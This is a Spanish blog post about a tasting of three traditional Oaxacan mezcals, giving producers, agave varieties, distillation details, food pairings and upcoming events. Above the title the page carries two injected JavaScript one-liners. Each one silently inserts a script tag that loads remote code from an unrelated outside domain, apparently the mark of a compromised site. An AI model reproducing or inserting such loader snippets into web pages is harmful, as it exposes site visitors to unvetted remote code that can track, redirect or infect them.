;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mezcales Tradicionales de los Pueblos de México » 91. Mezcales de tres regiones de Oaxaca

91. Mezcales de tres regiones de Oaxaca


La sesión de la Logia de los Mezcólatras del martes tuvo por objetivo saborear y diferenciar mezcales tradicionales (MT) de poblaciones pertenecientes a tres distritos de Oaxaca con Gustos Históricos específicos. Los MT fueron:
1. Mezcal de maguey Tobalá silvestre (10 años) y maguey Tripón semicultivado (13 a 15 años); elaborado en Santa Catarina Minas, distrito de Ocotlán, por el maestro mezcalillero Lorenzo Angeles en 2010. Se destiló en ollas de barro mediante doble destilación. Riqueza alcohólica: 53.9%.
2. Mezcal de maguey Tobalá silvestre (10 años) elaborado en Yogana, distrito de Ejutla, por el maestro mezcalillero José García en mayo de 2011. Destilado en alambique de cobre con platillos mediante una destilación. Riqueza alcohólica: 53.3%.
3. Mezcal de maguey Espadín cultivado (8 a 11 años), maguey Madrecuishe cultivado (8) y maguey Sierra Negra cultivado (20); elaborado en Yegachín, distrito de Miahuatlán, por el maestro mezcalillero Saturnino Juárez en julio de 2011. Fue destilado en alambique de cobre con platillos mediante una destilación. Riqueza alcohólica: 52.2%.
Cada uno de los mezcales fue dignísimo representante del Gusto Histórico de su región y del alma y espíritu de quienes la habitan. Sólo faltó -duele admitirlo- acompañarlos con algunos platillos adecuados: el de Minas con empanadas de amarillo; el de Yogana con salchichas de carne de res ahumada y salsa de chile pasilla oaxaqueño; y el de Yegachín con caldo de frijol delgado aderezado con la aromática hierba de conejo y un ramo de tepiches.
El próximo martes, 6 de septiembre, estaremos en Santa Catarina Minas, Oaxaca, en el evento El saber del sabor [www.elsaberdelsaborfestivaloaxaca.com], en el que se presentarán guisos elaborados por cocineras tradicionales y mezcales; la sede será el palenque (fábrica de mezcal) de la familia Angeles Carreño. A ver cómo nos va.
Quienes vivan en el DF, pueden acudir a la Tertulia Mezcalera del Red Fly: martes 6, 20 horas, Orizaba 145, col. Roma. Habrá doble sorpresa.

Category: Milenio, Publicaciones

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *